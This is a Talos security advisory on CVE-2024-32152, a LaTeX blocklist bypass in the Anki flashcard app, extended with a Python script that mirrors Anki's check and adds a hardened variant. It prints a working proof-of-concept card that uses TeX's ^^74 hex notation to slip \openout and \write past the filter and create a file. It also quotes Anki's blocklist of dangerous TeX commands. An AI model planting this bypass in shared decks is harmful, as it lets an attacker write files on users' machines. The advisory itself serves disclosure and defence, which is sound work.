Ankitects Anki LaTeX Blocklist Bypass vulnerability

Published: 2024-07-22 00:00:00
Source: Talos Intelligence (www.talosintelligence.com)
Tags: ankitects anki, blocklist bypass, vulnerability, latex, flashcard, arbitrary file, cve-2024-32152, cisco duo security

CVSS3 (index score; note that it differs from the 3.1 / AC:H vector given in the Talos report itself below)

4.3

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: LOW
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

AI Score: 7.1 (Confidence: Low)
EPSS: 0.001 (Percentile: 17.7%)

Talos Vulnerability Report

TALOS-2024-1994

Ankitects Anki LaTeX Blocklist Bypass vulnerability

July 22, 2024
CVE Number

CVE-2024-32152

SUMMARY

A blocklist bypass vulnerability exists in the LaTeX functionality of Ankitects Anki 24.04. A specially crafted malicious flashcard can lead to an arbitrary file creation at a fixed path. An attacker can share a malicious flashcard to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ankitects Anki 24.04

PRODUCT URLS

Anki - https://apps.ankiweb.net/

CVSSv3 SCORE

3.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

CWE

CWE-184 - Incomplete Blacklist

DETAILS

Anki is an open-source program that helps with memorization of information through the use of flash cards. It supports syncing of these cards across multiple computers as well as sharing cards with other users. It supports multiple different content types such as images, audio, videos, and scientific notation (via LaTeX).

Anki offers users the option to publicly share their decks, and importing them is normal behaviour; there are no warnings or checks in place to prevent using cards from someone else. A malicious user could share a deck to trigger the following vulnerability.

Anki uses LaTeX to render formulas, images and other TeX output in flashcards. Some TeX primitives allow a document to do things a flashcard should never be able to do, such as read or write files. Rendering requires a TeX distribution such as MiKTeX to be installed, as suggested by Anki's documentation. Anki uses a blocklist of command names, matched with a regular expression against the raw LaTeX source, to prevent these primitives from being called. The blocklist can be bypassed with TeX's `^^` hex notation: TeX's input processor rewrites `^^xx` into the character with hex code xx before the command name is tokenized, so TeX and the blocklist regex see two different strings.

Anki uses this code to block bad commands from being called.

for bad in (
    "\\write18",
    "\\readline",
    "\\input",
    "\\include",
    "\\catcode",
    "\\openout",
    "\\write",
    "\\loop",
    "\\def",
    "\\shipout",
):
    # don't mind if the sequence is only part of a command
    bad_re = f"\\{bad}[^a-zA-Z]"
    if re.search(bad_re, tmplatex):
        return col.tr.media_for_security_reasons_is_not(val=bad)

We can replace a character in a command name with its hex code to get around this blocklist. `^^74` is ASCII 0x74, the letter t, so TeX reads `\openou^^74` as `\openout` and `\wri^^74e` as `\write`, while the regex above never finds the literal strings `\openout` or `\write`. For example:

\documentclass[12pt]{article}
\special{papersize=3in,5in}
\usepackage[utf8]{inputenc}
\usepackage{amssymb,amsmath}
\pagestyle{empty}
\setlength{\parindent}{0in}
\begin{document}
\newwrite\outfile
% ^^74 is 't': TeX tokenizes \openout and \write, the blocklist regex does not match
\immediate\openou^^74\outfile=evil.txt
\wri^^74e\outfile{Hello, world!}
\closeout\outfile
\end{document}

An attacker using this bypass can create a file with arbitrary content and an attacker-chosen name inside the application's LaTeX working directory (/tmp/anki/ on Linux and C:\Users\<Username>\AppData\Local\Temp\anki_temp\ on Windows). The path is fixed because the file is written relative to the directory Anki runs LaTeX in; this is the "fixed path" referred to in the summary.
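The following Python script is an added example for this report and the blocklist excerpt above; it is not Anki's code and not part of the Talos advisory. It mirrors the 24.04 check exactly as quoted, shows that the `^^` payload slips past it, and adds a hardened variant that first reduces TeX's `^^` notation the way TeX's input processor does (`^^` plus two lowercase hex digits gives that byte; `^^` plus any other ASCII character c gives code(c)+64 below 64, otherwise code(c)-64; the reduced character is re-examined) before matching. The function names, the `[latex]...[/latex]` field scanner and the constructed sample field are assumptions for illustration; the hardened check is a suggestion, not the vendor's actual patch.

```python
import re

# Blocklist and regex construction exactly as quoted from Anki 24.04 above.
BAD_COMMANDS = (
    "\\write18", "\\readline", "\\input", "\\include", "\\catcode",
    "\\openout", "\\write", "\\loop", "\\def", "\\shipout",
)


def blocked_command(tmplatex: str):
    """Mirror of the 24.04 check on the raw source text.

    Returns the first blocklist entry found, or None if the source passes."""
    for bad in BAD_COMMANDS:
        bad_re = f"\\{bad}[^a-zA-Z]"  # backslash, name, then a non-letter
        if re.search(bad_re, tmplatex):
            return bad
    return None


def decode_carets(src: str) -> str:
    """Reduce TeX's ^^ notation the way TeX's input processor does.

    Assumes ^ keeps its default catcode 7 (the LaTeX default). "^^"
    followed by two lowercase hex digits becomes that byte; "^^" followed
    by any other ASCII character c becomes code(c)+64 (below 64) or
    code(c)-64. The reduced character is re-examined at the same position,
    so an encoded caret cannot hide a second layer of encoding."""
    buf = list(src)
    i = 0
    while i < len(buf):
        if buf[i] == "^" and i + 1 < len(buf) and buf[i + 1] == "^":
            two = "".join(buf[i + 2:i + 4])
            if len(two) == 2 and all(ch in "0123456789abcdef" for ch in two):
                buf[i:i + 4] = [chr(int(two, 16))]
                continue  # re-examine the new character at position i
            if i + 2 < len(buf) and ord(buf[i + 2]) < 128:
                buf[i:i + 3] = [chr((ord(buf[i + 2]) + 64) % 128)]
                continue
        i += 1
    return "".join(buf)


def blocked_command_hardened(tmplatex: str):
    """Added suggestion (not Anki's patch): match the blocklist against the
    text TeX will actually tokenize, not against the raw bytes."""
    return blocked_command(decode_carets(tmplatex))


# Anki wraps card LaTeX in [latex]...[/latex] tags inside a note field.
LATEX_TAG = re.compile(r"\[latex\](.*?)\[/latex\]", re.DOTALL)


def scan_field(field: str, hardened: bool = True) -> list:
    """Blocklist hits for every [latex] block in one note field."""
    check = blocked_command_hardened if hardened else blocked_command
    return [hit for hit in map(check, LATEX_TAG.findall(field)) if hit]


# Constructed sample field (not a real shared deck) carrying the card body
# from the report; Anki itself prepends the \documentclass... header.
MALICIOUS_FIELD = (
    "Bypass demo [latex]\n"
    "\\newwrite\\outfile\n"
    "\\immediate\\openou^^74\\outfile=evil.txt\n"
    "\\wri^^74e\\outfile{Hello, world!}\n"
    "\\closeout\\outfile\n"
    "[/latex]"
)

if __name__ == "__main__":
    print("24.04 check:", scan_field(MALICIOUS_FIELD, hardened=False))  # []
    print("hardened:   ", scan_field(MALICIOUS_FIELD))  # ['\\openout']
```

The decoder only helps while `^` keeps catcode 7; `\catcode` is on the blocklist, but any other route to changing catcodes would reopen the gap, so the simpler policy of rejecting any `^^` sequence outright is also reasonable for flashcards. Source filtering is a second line of defence in any case: the LaTeX process should run with shell escape disabled, and TeX Live's kpathsea default `openout_any = p` (paranoid) confines `\openout` to the working directory, which is consistent with the report's observation that the file lands at a fixed path rather than anywhere on disk.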

TIMELINE

2024-05-27 - Vendor Disclosure
2024-06-24 - Vendor Patch Release
2024-07-22 - Public Release

Credit

Discovered by Autumn Bee Skerritt of Cisco Duo Security and Jacob B.

